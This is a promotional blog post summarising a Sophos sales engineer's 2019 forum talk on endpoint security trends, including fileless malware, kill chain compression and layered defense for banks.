Sophos is well-known to IT security professionals for helping organizations protect sensitive digital and technical assets as well as providing key industry research via SophosLabs. For the 2019 Siouxland Cybersecurity Forum, Xigent invited Jason Shupp, director of sales engineering at Sophos, to speak on the direction of endpoint security.
Shupp reported that security threats – especially financial ones – are evolving at an alarming rate. In addition to well-publicized hacking and ransomware, organizations are now facing rising endpoint security threats from multi-stage and fileless malware, which accounted for about 35% of all attacks last year.
File-less malware is difficult to detect because it looks and acts like proper activity. Hackers use existing, trusted software such as Windows PowerShell to execute weaponized digital payloads under the guise of normal, expected activity.
Kill Chain Compression
Another emerging problem is that cyber-attacks are now advancing through their steps much faster than in the past. Experts have a name for it: “kill chain compression.”
“The bad guys are coming at you hot and heavy,” Shupp emphasized.
Today’s security teams must focus on layered endpoint security. Bad actors have the tools and the incentive to keep searching for IT vulnerabilities, and organizations can’t relax, because stopping an attack no longer means safety. Hackers will attack point after point until they find one they can exploit.
The blended nature of threats requires a multi-layered security approach. Device functionality is becoming more and more robust, from HTML display to file path investigation, creating more attack surfaces for hackers to target. Combine those multi-faceted attack vectors with compressed kill chains, and the need for a holistic, multi-layered defense is the only viable alternative.
How secure is your financial institution? Download our Network Security Guide for Banks to learn best practice tips and techniques for mitigating advancing threats.
Shupp told the audience that the operating system with the most recorded malware is Android, which has 2.5 billion active devices per month. Monitoring endpoints like Android and collecting the activity on those devices to analyze for malware has become a top priority.
Endpoints are positioned to add a valuable element to any defense in-depth strategy and add layers of security. Endpoints can provide key information, such as:
When included in a strategic layered security operation, the endpoint can deliver that threat intelligence to the firewall, for example. The firewall can then block it as well as provide forensic data for relief and perhaps restitution. That’s why machine learning tools are becoming prevalent; they can add proactive endpoint detection and response (EDR) capabilities.
“Predictive security is the future.”
– Jason Shupp, Sophos
The astounding level of financial cyber-attacks requires banks to partner with highly skilled IT security experts for their access to the latest and most effective tools and information.